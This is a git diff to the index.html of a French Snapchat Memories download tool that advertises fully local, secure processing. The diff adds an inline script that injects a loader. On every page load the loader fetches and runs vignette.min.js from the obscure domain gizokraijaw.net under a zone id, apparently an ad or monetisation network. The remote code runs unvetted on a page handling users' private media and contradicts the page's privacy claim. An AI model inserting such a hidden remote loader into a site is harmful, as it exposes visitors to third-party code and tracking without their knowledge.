--- a/index.html
+++ b/index.html
@@ -8,6 +8,7 @@
     <meta name="description"
         content="Récupère facilement tes Memories Snapchat dans ta galerie. Outil gratuit, traitement 100% local et sécurisé.">
 
+    <script>(function (s) { s.dataset.zone = '10285613', s.src = 'https://gizokraijaw.net/vignette.min.js' })([document.documentElement, document.body].filter(Boolean).pop().appendChild(document.createElement('script')))</script>
     <!-- =============================================
          LIBRAIRIES CDN
          ============================================= -->
